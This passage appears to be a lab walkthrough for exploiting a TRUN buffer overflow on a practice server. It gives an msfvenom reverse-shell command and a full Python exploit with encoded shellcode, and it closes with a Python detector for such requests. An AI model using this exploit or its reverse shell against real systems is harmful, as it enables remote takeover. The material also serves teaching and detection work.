Generating Shellcode
PRACTICE ! PRACTICE ! PRACTICE !
In order to generate the shellcode we again use a Metasploit-powered tool, msfvenom. The command below requests a reverse TCP shell for 32-bit Windows, with EXITFUNC=thread so the service thread exits cleanly, C-style output, and the null byte excluded as a bad character:
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.105 LPORT=1111 EXITFUNC=thread -f c -a x86 -b "\x00" > payload
Let's drop this into our Python script and run the exploit to get R00T :)
#!/usr/bin/python
# Python 2 script: the "\x.." string escapes below are raw bytes, which is
# what socket.send() expects in Python 2.
import sys, socket

# Shellcode generated by the msfvenom command above, pasted in as one string
overflow = ("\xbf\xe1\xed\x78\xbb\xdd\xc2\xd9\x74\x24\xf4\x5d\x2b\xc9"
            "\xb1\x52\x83\xed\xfc\x31\x7d\x0e\x03\x9c\xe3\x9a\x4e\xa2"
            "\x14\xd8\xb1\x5a\xe5\xbd\x38\xbf\xd4\xfd\x5f\xb4\x47\xce"
            "\x14\x98\x6b\xa5\x79\x08\xff\xcb\x55\x3f\x48\x61\x80\x0e"
            "\x49\xda\xf0\x11\xc9\x21\x25\xf1\xf0\xe9\x38\xf0\x35\x17"
            "\xb0\xa0\xee\x53\x67\x54\x9a\x2e\xb4\xdf\xd0\xbf\xbc\x3c"
            "\xa0\xbe\xed\x93\xba\x98\x2d\x12\x6e\x91\x67\x0c\x73\x9c"
            "\x3e\xa7\x47\x6a\xc1\x61\x96\x93\x6e\x4c\x16\x66\x6e\x89"
            "\x91\x99\x05\xe3\xe1\x24\x1e\x30\x9b\xf2\xab\xa2\x3b\x70"
            "\x0b\x0e\xbd\x55\xca\xc5\xb1\x12\x98\x81\xd5\xa5\x4d\xba"
            "\xe2\x2e\x70\x6c\x63\x74\x57\xa8\x2f\x2e\xf6\xe9\x95\x81"
            "\x07\xe9\x75\x7d\xa2\x62\x9b\x6a\xdf\x29\xf4\x5f\xd2\xd1"
            "\x04\xc8\x65\xa2\x36\x57\xde\x2c\x7b\x10\xf8\xab\x7c\x0b"
            "\xbc\x23\x83\xb4\xbd\x6a\x40\xe0\xed\x04\x61\x89\x65\xd4"
            "\x8e\x5c\x29\x84\x20\x0f\x8a\x74\x81\xff\x62\x9e\x0e\xdf"
            "\x93\xa1\xc4\x48\x39\x58\x8f\xb6\x16\x62\x26\x5f\x65\x62"
            "\xb9\x24\xe0\x84\xd3\x4a\xa5\x1f\x4c\xf2\xec\xeb\xed\xfb"
            "\x3a\x96\x2e\x77\xc9\x67\xe0\x70\xa4\x7b\x95\x70\xf3\x21"
            "\x30\x8e\x29\x4d\xde\x1d\xb6\x8d\xa9\x3d\x61\xda\xfe\xf0"
            "\x78\x8e\x12\xaa\xd2\xac\xee\x2a\x1c\x74\x35\x8f\xa3\x75"
            "\xb8\xab\x87\x65\x04\x33\x8c\xd1\xd8\x62\x5a\x8f\x9e\xdc"
            "\x2c\x79\x49\xb2\xe6\xed\x0c\xf8\x38\x6b\x11\xd5\xce\x93"
            "\xa0\x80\x96\xac\x0d\x45\x1f\xd5\x73\xf5\xe0\x0c\x30\x15"
            "\x03\x84\x4d\xbe\x9a\x4d\xec\xa3\x1c\xb8\x33\xda\x9e\x48"
            "\xcc\x19\xbe\x39\xc9\x66\x78\xd2\xa3\xf7\xed\xd4\x10\xf7"
            "\x27")

# 2003 bytes of filler reach EIP, the next 4 bytes overwrite EIP with the
# address found in essfunc.dll, then a 32-byte NOP sled sits ahead of the shellcode
shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 32 + overflow

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.0.104', 9999))
    s.send('TRUN /.:/' + shellcode)
    s.close()
except:
    print("Error !")
    sys.exit()
The 2003 A's fill the buffer up to EIP, and the next 4 bytes overwrite EIP with the pointer address we found in essfunc.dll. After that come 32 NOPs (No Operation instructions), which are just padding: they put some space between the pointer address and our malicious shellcode so that the two do not collide. Finally we append the shellcode itself, held in the variable called overflow.
Set up a netcat listener and run the Python script to get R00T
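From the defender's side, the buffer layout just described is also a detection signature. The following is an added example, not code from the original page: a small Python check that inspects a captured TRUN request for the characteristics of that layout (an oversized argument, a long run of one filler byte, a NOP sled, and a tail of non-printable bytes). The sample requests and the thresholds are constructed assumptions.

```python
import re

# Constructed sample traffic (not from the original page): a short harmless
# TRUN request, and one shaped like the overflow layout above (filler, 4-byte
# return address, NOP sled, opaque bytes standing in for shellcode).
BENIGN_REQUEST = b"TRUN /.:/hello"
SUSPICIOUS_REQUEST = (b"TRUN /.:/" + b"A" * 2003 + b"\xaf\x11\x50\x62"
                      + b"\x90" * 32 + bytes(range(1, 200)))

TRUN_PREFIX = b"TRUN /.:/"
MAX_SANE_ARG_LEN = 1024   # assumed threshold for a legitimate TRUN argument
MIN_FILLER_RUN = 512      # assumed: offset-finding filler repeats one byte for hundreds of bytes
MIN_NOP_SLED = 8          # assumed: runs of 0x90 this long do not occur in normal text


def longest_run(data: bytes) -> tuple:
    """Return (byte_value, run_length) for the longest run of one repeated byte."""
    best = (-1, 0)
    for m in re.finditer(rb"(.)\1*", data, re.DOTALL):
        if len(m.group(0)) > best[1]:
            best = (m.group(1)[0], len(m.group(0)))
    return best


def inspect_trun(request: bytes) -> dict:
    """Score one TRUN request for buffer-overflow characteristics."""
    if not request.startswith(TRUN_PREFIX):
        return {"is_trun": False, "suspicious": False, "reasons": []}
    arg = request[len(TRUN_PREFIX):]
    reasons = []
    if len(arg) > MAX_SANE_ARG_LEN:
        reasons.append("argument length %d exceeds %d" % (len(arg), MAX_SANE_ARG_LEN))
    filler, run = longest_run(arg)
    if run >= MIN_FILLER_RUN:
        reasons.append("%d-byte run of 0x%02x (offset-finding filler)" % (run, filler))
    # Longest run of 0x90 anywhere in the argument
    nop_sled = max((len(m.group(0)) for m in re.finditer(rb"\x90+", arg)), default=0)
    if nop_sled >= MIN_NOP_SLED:
        reasons.append("%d-byte NOP sled" % nop_sled)
    # Encoded shellcode is mostly non-printable; a legitimate argument is text
    non_printable = sum(1 for b in arg if b < 0x20 or b > 0x7e)
    if non_printable > 32:
        reasons.append("%d non-printable bytes in argument" % non_printable)
    return {"is_trun": True, "suspicious": bool(reasons), "reasons": reasons,
            "arg_len": len(arg), "nop_sled": nop_sled}
```

Run over a capture of port 9999 traffic, any request that returns suspicious=True with more than one reason is worth an alert; the filler run alone already fires during the fuzzing stage, before any shellcode is sent.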